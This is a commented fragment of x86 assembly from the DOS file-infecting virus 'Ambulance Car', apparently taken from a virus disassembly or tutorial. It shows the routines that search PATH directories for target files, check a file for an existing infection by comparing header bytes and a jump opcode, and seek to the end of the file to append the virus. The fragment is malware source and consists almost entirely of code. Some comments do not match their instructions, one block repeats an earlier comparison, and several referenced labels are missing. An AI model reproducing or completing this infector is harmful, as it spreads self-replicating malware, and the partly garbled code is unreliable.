loadpath proc near ; this procedure checks for the
mov ax,ds:psp_envirn_seg ; existence of the ASCII path string in the
mov es,ax ; environment block of the program
push ds ; segment prefix (in this case psp_envirn_seg)
mov ax,40h ; if it exists, Ambulance Car copies
mov ds,ax ; the entire string into a buffer by using
mov bp,ds:data_3e ; '/' and ';' as cues. The virus then
pop ds ; sets the DTA to a directory
test bp,3 ; found in the path and executes a simple
jz loc_8 ; file search. If unproductive, it
xor bx,bx ; recursively searches the path
loc_6: ; before defaulting to the current
mov ax,es:[bx] ; directory
cmp ax,4150h
jne loc_7
cmp word ptr es:[bx+2],4854h
je loc_9
loc_7:
inc bx
or ax,ax
jnz loc_6 ; jump if not zero
loc_8:
lea di,[si+428h]
mov cx,data_15[si]
cmp ax,word ptr ds:[100h][si] ; compare with data copied above
jne infect ; jump if not equal to infect
mov al,byte ptr ds:[414h][si]
cmp al,0E9h ; compare with 0E9h
jne infect ; if not equal, assume virus not here - infect
mov dx,word ptr ds:[415h][si]
mov bx,word ptr ds:[417h][si]
add dx,3
xor cx,cx ; zero register
mov ax,4200h
int 21h ; point to beginning of file, again
; bx contains the handle
mov bx,word ptr ds:[417h][si]
mov cx,6
lea dx,[si+41Ch] ; load effective address
mov ah,3Fh ; and read the first 6 bytes
int 21h ; this time
; ds:dx points to buffer
mov ax,data_13[si]
mov bx,data_14[si]
mov cx,data_15[si]
cmp ax,word ptr ds:[100h][si] ; compare with data copied above
jne infect ; jump if not equal to infect
cmp bx,data_5[si]
jne infect ; jump if not equal
cmp cx,data_7[si]
je close ; finally, if we get a match we know
infect: ; we're here, so go to close up
mov bx,word ptr ds:[417h][si]
xor cx,cx ; zero register
xor dx,dx ; zero register
mov ax,4202h
int 21h ; reset pointer to end of file
; bx contains file handle
